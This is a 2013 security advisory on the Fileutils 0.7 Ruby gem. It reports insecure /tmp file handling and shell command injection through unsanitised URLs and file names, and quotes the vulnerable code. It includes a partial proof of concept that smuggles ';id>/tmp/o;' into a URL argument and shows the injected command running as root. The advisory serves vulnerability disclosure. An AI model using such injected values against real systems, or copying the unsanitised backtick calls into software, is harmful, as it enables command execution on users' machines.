Advisory #: 36
Title: Fileutils 0.7 Ruby Gem remote command execution and insecure file handling in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2013-02-24
Download Site:
Vendor: Stefaan Colman
Vendor Notified: 2013-02-24
Vendor Contact:
Description: A set of utility classes to extract meta data from different file types.
Handles files insecurely in /tmp, a directory is created for that file extension say 'zip' and files are maniplated there. This directory can be hijacked and the contents manipulated by a malicious user. in ./lib/file_utils.rb 15 def zip (target, *sources) 16 targetdir = "{FileUtils::Config.tmp_dir}/zip" 17 id = 1 18 while File.exists?(targetdir) 19 targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}" 20 id += 1 21 end 22 FileUtils.mkdir(targetdir) where Config.tmp_dir = /tmp in ./lib/file_utils/config.rb 5 def self.tmp_dir 6 @tmp_dir ||= '/tmp' 7 end Remote command execution: From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution. If a URL contains shell characters say a ';' followed by a command a remote attacker execute a command on the clients system if they are enticed to click an encoded url like: need to test URL encoding not sure if this is valid.;id>/tmp/o; -> 7 def capture (url, target) 8 command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url={url} --out={target}") 9 `#{command}` 10 end partial PoC if client is tricked into using malicious URL: irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error: Xvfb failed to start sh: 1: --out=/tmp/tempf: not found => "" irb(main):002:0> root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo -rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo uid=0(root) gid=0(root) groups=0(root) root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# Michael Scherer of found other issues during a discussion about the above issues I found: 1.) In fact, there is the same similar problem in another file : result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}` I quickly checked using irb ( a quick command line to type ruby snippet, and yes, using funky chars result in funky results. 2.) There is another issue in # Generates a temp filepath for the given extension def temp (extension) path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1 while File.exists?(path) path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}" id += 1 end since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file. Details for above vulnererabilites: on (1) file_utils.rb the /tmp file issue is between lines 86 - 92. in file 86 def temp (extension) 87 path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" 88 id = 1 89 while File.exists?(path) 90 path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}" 91 id += 1 92 end And on (2) the file name is ./lib/file_utils/open_office.rb on line 27, if the filename being converted contains characters like ; a command can be injected as well. 27 result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`
Exploit Code:
Screen Shots: